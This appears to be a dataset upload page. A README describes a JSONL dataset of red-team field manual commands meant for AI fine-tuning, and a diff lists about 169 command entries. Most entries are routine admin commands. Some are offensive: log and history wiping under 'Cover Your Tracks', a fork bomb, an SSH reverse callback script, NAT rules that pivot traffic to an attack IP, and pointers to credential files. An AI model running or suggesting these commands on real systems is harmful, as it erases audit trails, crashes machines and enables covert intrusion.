Upload rtfm_manual_commands.jsonl
Browse files# RTFM Manual Commands Dataset
A structured and machine-readable dataset extracted from the **Red Team Field Manual (RTFM)**. This collection of categorized terminal commands is designed for use in cybersecurity tooling, AI fine-tuning, command recommendation engines, and red team automation systems.
## 📁 Dataset Format
The dataset is provided in **`.jsonl` (JSON Lines)** format, where each line represents a command entry with the following fields:
- `category` — The logical section from the manual (e.g., `"LINUX NETWORK COMMANDS"`)
- `command` — The exact command-line syntax
- `description` — A brief explanation of the command’s function
### 🔍 Example
```json
{
"category": "LINUX NETWORK COMMANDS",
"command": "netstat -tulpn",
"description": "Show all TCP/UDP connections"
}
This dataset is suitable for:
Training/fine-tuning AI assistants or LLMs (e.g., GPT-style models)
Building context-aware command suggestion engines
Integrating into red team or blue team automation pipelines
Creating cheat sheet generators or CLI reference bots
📊 Statistics
Total entries: ~X (fill in once known)
Categories included:
Linux Networking
Windows System Information
Powershell
TCPDump
Covering Tracks
Firewall Bypass
and many more
⚖️ License
This dataset is shared under the MIT . You are free to use, modify, and redistribute it for any purpose, including commercial.
Portions of this dataset are derived from the public content of the RTFM manual and restructured for machine learning research and educational use.
🤝 Contributions
Pull requests are welcome! If you'd like to expand this dataset, clean entries, or add new sections (e.g., Active Directory, web enumeration, etc.), feel free to fork or open an issue.
📫 Contact
Maintained by: [SUNNY THAKUR]
GitHub: github.com/SUNNYTHAKUR25
- rtfm_manual_commands.jsonl +696 -0
|
@@ -0,0 +1,696 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
{"category": "Linux Network Commands", "command": "watch ss -tp", "description": "Network connections"}
|
| 2 |
+
{"category": "Linux Network Commands", "command": "netstat -ant", "description": "Tcp connections -anu=udp"}
|
| 3 |
+
{"category": "Linux Network Commands", "command": "netstat -tulpn", "description": "Connections with PIDs"}
|
| 4 |
+
{"category": "Linux Network Commands", "command": "lsof -i", "description": "Established connections"}
|
| 5 |
+
{"category": "Linux Network Commands", "command": "smb://ip/share", "description": "Access windows smb share"}
|
| 6 |
+
{"category": "Linux Network Commands", "command": "share user x.x.x.x c$", "description": "Mount Windows share"}
|
| 7 |
+
{"category": "Linux Network Commands", "command": "smbclient -U user \\\\ip\\share", "description": "SMB connect"}
|
| 8 |
+
{"category": "Linux Network Commands", "command": "ifconfig eth0 ip/cidr", "description": "Set IP and netmask"}
|
| 9 |
+
{"category": "Linux Network Commands", "command": "ifconfig eth0:1 ip/cidr", "description": "Set virtual interface"}
|
| 10 |
+
{"category": "Linux Network Commands", "command": "route add default gw gw_ip", "description": "Set GW"}
|
| 11 |
+
{"category": "Linux Network Commands", "command": "ifconfig eth0 mtu [size]", "description": "Change MTU size"}
|
| 12 |
+
{"category": "Linux Network Commands", "command": "ifconfig int hw ether", "description": "Change MAC"}
|
| 13 |
+
{"category": "Linux Network Commands", "command": "macchanger -r int", "description": "Randomize MAC"}
|
| 14 |
+
{"category": "Linux Network Commands", "command": "iwlist int scan", "description": "Built-in wifi scanner"}
|
| 15 |
+
{"category": "Linux Network Commands", "command": "dig -x ip", "description": "Domain lookup for IP"}
|
| 16 |
+
{"category": "Linux Network Commands", "command": "host ip", "description": "Domain lookup for IP"}
|
| 17 |
+
{"category": "Linux Network Commands", "command": "host -t srv _service._tcp.url.com", "description": "Domain SRV lookup"}
|
| 18 |
+
{"category": "Linux Network Commands", "command": "dig @ip domain -t AXFR", "description": "DNS zone transfer"}
|
| 19 |
+
{"category": "Linux Network Commands", "command": "host -l domain nameserver", "description": "DNS zone transfer"}
|
| 20 |
+
{"category": "Linux Network Commands", "command": "ip xfrm state list", "description": "Print existing VPN keys"}
|
| 21 |
+
{"category": "Linux Network Commands", "command": "ip addr add ip/cidr dev eth0", "description": "Add 'hidden' interface"}
|
| 22 |
+
{"category": "Linux Network Commands", "command": "/var/log/messages | grep DHCP", "description": "List DHCP assignments"}
|
| 23 |
+
{"category": "Linux Network Commands", "command": "tcpkill host ip and port port", "description": "Block ip/port"}
|
| 24 |
+
{"category": "Linux Network Commands", "command": "echo \"1\" > /proc/sys/net/ipv4/ip_forward", "description": "Turn on IP forwarding"}
|
| 25 |
+
{"category": "Linux Network Commands", "command": "echo \"nameserver x.x.x.x\" > /etc/resolv.conf", "description": "Add DNS server"}
|
| 26 |
+
{"category": "Linux System Info", "command": "nbtstat -A ip", "description": "Get hostname for IP"}
|
| 27 |
+
{"category": "Linux System Info", "command": "id", "description": "Current username"}
|
| 28 |
+
{"category": "Linux System Info", "command": "w", "description": "Logged on users"}
|
| 29 |
+
{"category": "Linux System Info", "command": "who -a", "description": "User information"}
|
| 30 |
+
{"category": "Linux System Info", "command": "last -a", "description": "Last users logged on"}
|
| 31 |
+
{"category": "Linux System Info", "command": "ps -ef", "description": "Process listing"}
|
| 32 |
+
{"category": "Linux System Info", "command": "df -h", "description": "Disk usage (free)"}
|
| 33 |
+
{"category": "Linux System Info", "command": "uname -a", "description": "Kernel version/CPU info"}
|
| 34 |
+
{"category": "Linux System Info", "command": "mount", "description": "Mounted file systems"}
|
| 35 |
+
{"category": "Linux System Info", "command": "getent passwd", "description": "Show list of users"}
|
| 36 |
+
{"category": "Linux System Info", "command": "PATH=$PATH:/home/mypath", "description": "Add to PATH variable"}
|
| 37 |
+
{"category": "Linux System Info", "command": "kill pid", "description": "Kills process with pid"}
|
| 38 |
+
{"category": "Linux System Info", "command": "cat /etc/issue", "description": "Show OS info"}
|
| 39 |
+
{"category": "Linux System Info", "command": "cat /etc/*release*", "description": "Show OS version info"}
|
| 40 |
+
{"category": "Linux System Info", "command": "cat /proc/version", "description": "Show kernel info"}
|
| 41 |
+
{"category": "Linux System Info", "command": "rpm --query -all", "description": "Installed packages (Redhat)"}
|
| 42 |
+
{"category": "Linux System Info", "command": "rpm -ivh *.rpm", "description": "Install RPM package"}
|
| 43 |
+
{"category": "Linux System Info", "command": "dpkg --get-selections", "description": "Installed packages (Ubuntu)"}
|
| 44 |
+
{"category": "Linux System Info", "command": "dpkg -I *.deb", "description": "Installed packages (Ubuntu)"}
|
| 45 |
+
{"category": "Linux System Info", "command": "pkginfo", "description": "Installed packages (Solaris)"}
|
| 46 |
+
{"category": "Linux System Info", "command": "which tcsh/csh/ksh/bash", "description": "Show location of executable"}
|
| 47 |
+
{"category": "Linux System Info", "command": "chmod 500 tcsh/csh/ksh", "description": "Disable shell, force bash"}
|
| 48 |
+
{"category": "Linux Utility Commands", "command": "rdestop ip", "description": "Grab VNC desktop from IP"}
|
| 49 |
+
{"category": "Linux Utility Commands", "command": "scp /src/file [email protected]:/dst/file", "description": "Copy file to remote host"}
|
| 50 |
+
{"category": "Linux Utility Commands", "command": "scp user@remoteip:/src/file /dst/file", "description": "Get file from remote host"}
|
| 51 |
+
{"category": "Linux Utility Commands", "command": "useradd -m user", "description": "Add user"}
|
| 52 |
+
{"category": "Linux Utility Commands", "command": "passwd user", "description": "Change user password"}
|
| 53 |
+
{"category": "Linux Utility Commands", "command": "rmuser username", "description": "Remove user"}
|
| 54 |
+
{"category": "Linux Utility Commands", "command": "script -a outfile", "description": "Record shell (Ctrl+D stops)"}
|
| 55 |
+
{"category": "Linux Utility Commands", "command": "apropos subject", "description": "Find related command"}
|
| 56 |
+
{"category": "Linux Utility Commands", "command": "history", "description": "View user command history"}
|
| 57 |
+
{"category": "Linux Utility Commands", "command": "!num", "description": "Execute line in history"}
|
| 58 |
+
{"category": "Linux Utility Commands", "command": "diff file1 file2", "description": "Compare files"}
|
| 59 |
+
{"category": "Linux Utility Commands", "command": "rm -rf dir", "description": "Force delete directory"}
|
| 60 |
+
{"category": "Linux Utility Commands", "command": "shred -f -u file", "description": "Overwrite/delete file"}
|
| 61 |
+
{"category": "Linux Utility Commands", "command": "touch -r ref_file file", "description": "Match ref_file timestamp"}
|
| 62 |
+
{"category": "Linux Utility Commands", "command": "touch -t YYYYMMDDHHMM file", "description": "Set file timestamp"}
|
| 63 |
+
{"category": "Linux Utility Commands", "command": "sudo fdisk -l", "description": "List connected drives"}
|
| 64 |
+
{"category": "Linux Utility Commands", "command": "mount /dev/sda1 /mnt/usbkey", "description": "Mount USB key"}
|
| 65 |
+
{"category": "Linux Utility Commands", "command": "md5sum file", "description": "Compute MD5 hash"}
|
| 66 |
+
{"category": "Linux Utility Commands", "command": "echo -n \"str\" | md5sum", "description": "Generate MD5 hash"}
|
| 67 |
+
{"category": "Linux Utility Commands", "command": "sha1sum file", "description": "SHA1 hash of file"}
|
| 68 |
+
{"category": "Linux Utility Commands", "command": "sort -u file", "description": "Sort/show unique lines"}
|
| 69 |
+
{"category": "Linux Utility Commands", "command": "grep -c \"str\" file", "description": "Count lines with \"str\""}
|
| 70 |
+
{"category": "Linux Utility Commands", "command": "tar cf file.tar files", "description": "Create tar from files"}
|
| 71 |
+
{"category": "Linux Utility Commands", "command": "tar xf file.tar", "description": "Extract tar"}
|
| 72 |
+
{"category": "Linux Utility Commands", "command": "tar czf file.tar.gz files", "description": "Create tar.gz"}
|
| 73 |
+
{"category": "Linux Utility Commands", "command": "tar xzf file.tar.gz", "description": "Extract tar.gz"}
|
| 74 |
+
{"category": "Linux Utility Commands", "command": "tar cjf file.tar.bz2 files", "description": "Create tar.bz2"}
|
| 75 |
+
{"category": "Linux Utility Commands", "command": "tar xjf file.tar.bz2", "description": "Extract tar.bz2"}
|
| 76 |
+
{"category": "Linux Utility Commands", "command": "gzip file", "description": "Compress/rename file"}
|
| 77 |
+
{"category": "Linux Utility Commands", "command": "gzip -d file.gz", "description": "Decompress file.gz"}
|
| 78 |
+
{"category": "Linux Utility Commands", "command": "upx -9 -o out.exe orig.exe", "description": "UPX pack orig.exe"}
|
| 79 |
+
{"category": "Linux Utility Commands", "command": "zip -r zipname.zip directory", "description": "Create zip"}
|
| 80 |
+
{"category": "Linux Utility Commands", "command": "dd skip=1000 count=2000 bs=8 if=file of=file", "description": "Cut block 1K-3K from file"}
|
| 81 |
+
{"category": "Linux Utility Commands", "command": "split -b 9K file prefix", "description": "Split file into 9K chunks"}
|
| 82 |
+
{"category": "Linux Utility Commands", "command": "find / -name file -type f -name \"*.pdf\"", "description": "Find PDF files"}
|
| 83 |
+
{"category": "Linux Utility Commands", "command": "find / -perm -4000 -o -perm -2000 -exec ls -l {} \\;", "description": "Search for setuid/setgid files"}
|
| 84 |
+
{"category": "Linux Utility Commands", "command": "dos2unix file", "description": "Convert to Unix format"}
|
| 85 |
+
{"category": "Linux Utility Commands", "command": "file file", "description": "Determine file type/info"}
|
| 86 |
+
{"category": "Linux Utility Commands", "command": "chattr +i file", "description": "Set immutable bit"}
|
| 87 |
+
{"category": "Linux Utility Commands", "command": "chattr -i file", "description": "Unset immutable bit"}
|
| 88 |
+
{"category": "Linux Misc Commands", "command": "unset HISTFILE", "description": "Disable history logging"}
|
| 89 |
+
{"category": "Linux Misc Commands", "command": "arecord - | aplay -", "description": "Record remote mic"}
|
| 90 |
+
{"category": "Linux Misc Commands", "command": "gcc -o outfile myfile.c", "description": "Compile C/C++"}
|
| 91 |
+
{"category": "Linux Misc Commands", "command": "init 6", "description": "Reboot (no shutdown)"}
|
| 92 |
+
{"category": "Linux Misc Commands", "command": "cat /etc/*syslog*.conf | grep -v \"^\\s*#\"", "description": "List log files"}
|
| 93 |
+
{"category": "Linux Misc Commands", "command": "grep \"href=\" file | cut -d\"/\" -f3 | grep url | sort -u", "description": "Strip links in url.com"}
|
| 94 |
+
{"category": "Linux Misc Commands", "command": "dd if=/dev/urandom of=file bs=3145728 count=100", "description": "Make random 300MB file"}
|
| 95 |
+
{"category": "Linux Cover Your Tracks", "command": "echo \"\" > /var/log/auth.log", "description": "Clear auth.log file"}
|
| 96 |
+
{"category": "Linux Cover Your Tracks", "command": "echo \"\" > ~/.bash_history", "description": "Clear current user bash history"}
|
| 97 |
+
{"category": "Linux Cover Your Tracks", "command": "rm ~/.bash_history -rf", "description": "Delete .bash_history file"}
|
| 98 |
+
{"category": "Linux Cover Your Tracks", "command": "history -c", "description": "Clear current session history"}
|
| 99 |
+
{"category": "Linux Cover Your Tracks", "command": "export HISTSIZE=0", "description": "Set history max lines to 0"}
|
| 100 |
+
{"category": "Linux Cover Your Tracks", "command": "export HISTFILESIZE=0", "description": "Set history max commands to 0"}
|
| 101 |
+
{"category": "Linux Cover Your Tracks", "command": "unset HISTFILE", "description": "Disable history logging"}
|
| 102 |
+
{"category": "Linux Cover Your Tracks", "command": "kill -9 $$", "description": "Kill current session"}
|
| 103 |
+
{"category": "Linux Cover Your Tracks", "command": "ln /dev/null ~/.bash_history -sf", "description": "Permanently send bash history to /dev/null"}
|
| 104 |
+
{"category": "Linux File System", "command": "/bin", "description": "User binary"}
|
| 105 |
+
{"category": "Linux File System", "command": "/boot", "description": "Boot loader files"}
|
| 106 |
+
{"category": "Linux File System", "command": "/dev", "description": "Device files"}
|
| 107 |
+
{"category": "Linux File System", "command": "/etc", "description": "Configuration files"}
|
| 108 |
+
{"category": "Linux File System", "command": "/home", "description": "User home directories"}
|
| 109 |
+
{"category": "Linux File System", "command": "/lib", "description": "System libraries"}
|
| 110 |
+
{"category": "Linux File System", "command": "/opt", "description": "Optional software"}
|
| 111 |
+
{"category": "Linux File System", "command": "/proc", "description": "Process information"}
|
| 112 |
+
{"category": "Linux File System", "command": "/root", "description": "Root user home"}
|
| 113 |
+
{"category": "Linux File System", "command": "/sbin", "description": "System binaries"}
|
| 114 |
+
{"category": "Linux File System", "command": "/tmp", "description": "Temporary files"}
|
| 115 |
+
{"category": "Linux File System", "command": "/usr", "description": "User utilities and apps"}
|
| 116 |
+
{"category": "Linux File System", "command": "/var", "description": "Variable data (logs, etc.)"}
|
| 117 |
+
{"category": "Linux Scripting", "command": "for x in $(seq 1 254); do ping -c 1 1.1.1.$x | grep \"64 b\" | cut -d\" \" -f4 >> ips.txt; done", "description": "Ping sweep for live hosts"}
|
| 118 |
+
{"category": "Linux Scripting", "command": "#!/bin/bash\necho \"Enter Class C Range: i.e. 192.168.3\"\nread range\nfor ip in $(seq 1 254); do\nhost $range.$ip | grep \"name pointer\" | cut -d\" \" -f5\ndone", "description": "Automated domain name resolve"}
|
| 119 |
+
{"category": "Linux Scripting", "command": ":(){ :|:& };:", "description": "Fork bomb (crashes system)"}
|
| 120 |
+
{"category": "Linux Scripting", "command": "for ip in $(seq 1 254); do dig -x 1.1.1.$ip | grep $ip >> dns.txt; done", "description": "DNS reverse lookup"}
|
| 121 |
+
{"category": "Linux Scripting", "command": "#!/bin/sh\n# This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2\nfor ip in $(seq 2 254); do\niptables -A INPUT -s 192.168.1.$ip -j DROP\ndone", "description": "IP banning script"}
|
| 122 |
+
{"category": "SSH Callback", "command": "#!/bin/sh\nkillall ssh /dev/null 2>&1\nsleep 5\nREMPORT=4040\nREMSRV=user\nHOSTS=\"domain1.com domain2.com domain3.com\"\nfor LIVEHOST in $HOSTS;\ndo\nscount=$(ping -c 2 $LIVEHOST | awk '{print $1}' | grep -c received)\nif [ $scount -gt 0 ]; then\nssh -R $REMPORT:localhost:22 -i id_rsa $REMSRV@$LIVEHOST\ndone", "description": "Establish SSH callback"}
|
| 123 |
+
{"category": "IPTables", "command": "iptables-restore file", "description": "Restore iptables from file"}
|
| 124 |
+
{"category": "IPTables", "command": "iptables -F", "description": "Flush all rules"}
|
| 125 |
+
{"category": "IPTables", "command": "iptables -A INPUT -s ip -j DROP", "description": "Block incoming traffic from IP"}
|
| 126 |
+
{"category": "IPTables", "command": "iptables -A OUTPUT -d ip -j DROP", "description": "Block outgoing traffic to IP"}
|
| 127 |
+
{"category": "IPTables", "command": "iptables -A INPUT -p tcp --dport port -j DROP", "description": "Block TCP port incoming"}
|
| 128 |
+
{"category": "IPTables", "command": "iptables -A OUTPUT -p tcp --dport port -j DROP", "description": "Block TCP port outgoing"}
|
| 129 |
+
{"category": "IPTables", "command": "iptables -A INPUT -p udp --dport port -j DROP", "description": "Block UDP port incoming"}
|
| 130 |
+
{"category": "IPTables", "command": "iptables -A OUTPUT -p udp --dport port -j DROP", "description": "Block UDP port outgoing"}
|
| 131 |
+
{"category": "IPTables", "command": "iptables -A INPUT -i int -j DROP", "description": "Block interface incoming"}
|
| 132 |
+
{"category": "IPTables", "command": "iptables -A OUTPUT -o int -j DROP", "description": "Block interface outgoing"}
|
| 133 |
+
{"category": "IPTables", "command": "iptables -L -v", "description": "List rules with stats"}
|
| 134 |
+
{"category": "Linux Files", "command": "/etc/shadow", "description": "Local users' hashes"}
|
| 135 |
+
{"category": "Linux Files", "command": "/etc/passwd", "description": "Local users"}
|
| 136 |
+
{"category": "Linux Files", "command": "/etc/group", "description": "Local groups"}
|
| 137 |
+
{"category": "Linux Files", "command": "/etc/rc.d", "description": "Startup services"}
|
| 138 |
+
{"category": "Linux Files", "command": "/etc/init.d", "description": "Service"}
|
| 139 |
+
{"category": "Linux Files", "command": "/etc/hosts", "description": "Known hostnames and IPs"}
|
| 140 |
+
{"category": "Linux Files", "command": "/etc/hostname", "description": "Full hostname with domain"}
|
| 141 |
+
{"category": "Linux Files", "command": "/etc/network/interfaces", "description": "Network configuration"}
|
| 142 |
+
{"category": "Linux Files", "command": "/etc/profile", "description": "System environment variables"}
|
| 143 |
+
{"category": "Linux Files", "command": "/etc/apt/sources.list", "description": "Ubuntu sources list"}
|
| 144 |
+
{"category": "Linux Files", "command": "/etc/resolv.conf", "description": "Nameserver configuration"}
|
| 145 |
+
{"category": "Linux Files", "command": "/home/user/.bash_history", "description": "Bash history (also /root/)"}
|
| 146 |
+
{"category": "Linux Files", "command": "/usr/share/wireshark/manuf", "description": "Vendor-MAC lookup"}
|
| 147 |
+
{"category": "Linux Files", "command": "~/.ssh/", "description": "SSH keystore"}
|
| 148 |
+
{"category": "Linux Files", "command": "/var/log", "description": "System log files (most Linux)"}
|
| 149 |
+
{"category": "Linux Files", "command": "/var/adm", "description": "System log files (Unix)"}
|
| 150 |
+
{"category": "Linux Files", "command": "/var/spool/cron", "description": "List cron files"}
|
| 151 |
+
{"category": "Linux Files", "command": "/var/log/apache/access.log", "description": "Apache connection log"}
|
| 152 |
+
{"category": "Linux Files", "command": "/etc/fstab", "description": "Static file system info"}
|
| 153 |
+
{"category": "Linux Scripting", "command": "for x in {1..254}; do ping -c 1 1.1.1.$x | grep \"64 bytes\" | cut -d\" \" -f4 >> ips.txt; done", "description": "Ping sweep for live hosts"}
|
| 154 |
+
{"category": "Linux Scripting", "command": "#!/bin/bash\necho \"Enter Class C Range: i.e. 192.168.3\"\nread range\nfor ip in {1..254}; do\nhost $range.$ip | grep \"name pointer\" | cut -d\" \" -f5\ndone", "description": "Automated domain name resolve"}
|
| 155 |
+
{"category": "Linux Scripting", "command": ":(){ :|: & };:", "description": "Fork bomb (crashes system)"}
|
| 156 |
+
{"category": "Linux Scripting", "command": "for ip in {1..254}; do dig -x 1.1.1.$ip | grep $ip >> dns.txt; done", "description": "DNS reverse lookup"}
|
| 157 |
+
{"category": "Linux Scripting", "command": "#!/bin/sh\n# This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2\ni=2\nwhile [ $i -le 253 ]; do\nif [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then\necho \"BANNED: iptables -A INPUT -s 192.168.1.$i -j DROP\"\niptables -A INPUT -s 192.168.1.$i -j DROP\nelse\necho \"IP NOT BANNED: 192.168.1.$i\"\nfi\ni=$((i + 1))\ndone", "description": "IP banning script"}
|
| 158 |
+
{"category": "IPTables", "command": "iptables -A OUTPUT -o iface -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT", "description": "Allow SSH on port 22 outbound"}
|
| 159 |
+
{"category": "IPTables", "command": "iptables -A INPUT -i iface -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT", "description": "Allow SSH on port 22 inbound"}
|
| 160 |
+
{"category": "IPTables", "command": "iptables -A OUTPUT -o iface -p icmp --icmp-type echo-request -j ACCEPT", "description": "Allow ICMP echo-request outbound"}
|
| 161 |
+
{"category": "IPTables", "command": "iptables -A INPUT -i iface -p icmp --icmp-type echo-reply -j ACCEPT", "description": "Allow ICMP echo-reply inbound"}
|
| 162 |
+
{"category": "IPTables", "command": "echo \"1\" > /proc/sys/net/ipv4/ip_forward", "description": "Enable IP forwarding"}
|
| 163 |
+
{"category": "IPTables", "command": "sysctl net.ipv4.ip_forward=1", "description": "Enable IP forwarding (alternative)"}
|
| 164 |
+
{"category": "IPTables", "command": "iptables -t nat -A PREROUTING -p tcp -i eth0 -d pivotip --dport 443 -j DNAT --to-destination attkip:443", "description": "Port forward TCP 443 to attack IP"}
|
| 165 |
+
{"category": "IPTables", "command": "iptables -t nat -A POSTROUTING -p tcp -i eth0 -s target_subnet_cidr -d attkip --dport 443 -j SNAT --to-source pivotip", "description": "Source NAT for port forwarding"}
|
| 166 |
+
{"category": "IPTables", "command": "iptables -t filter -I FORWARD 1 -j ACCEPT", "description": "Allow forwarding for port forwarding"}
|
| 167 |
+
{"category": "IPTables", "command": "iptables -A INPUT -s 1.1.1.0/24 -m state --state RELATED,ESTABLISHED,NEW -p tcp -m multiport --dports 80,443 -j ACCEPT", "description": "Allow 1.1.1.0/24 on ports 80,443"}
|
| 168 |
+
{"category": "IPTables", "command": "iptables -A INPUT -i eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT", "description": "Allow related/established on eth0"}
|
| 169 |
+
{"category": "IPTables", "command": "iptables -P INPUT DROP", "description": "Set default INPUT policy to DROP"}
|
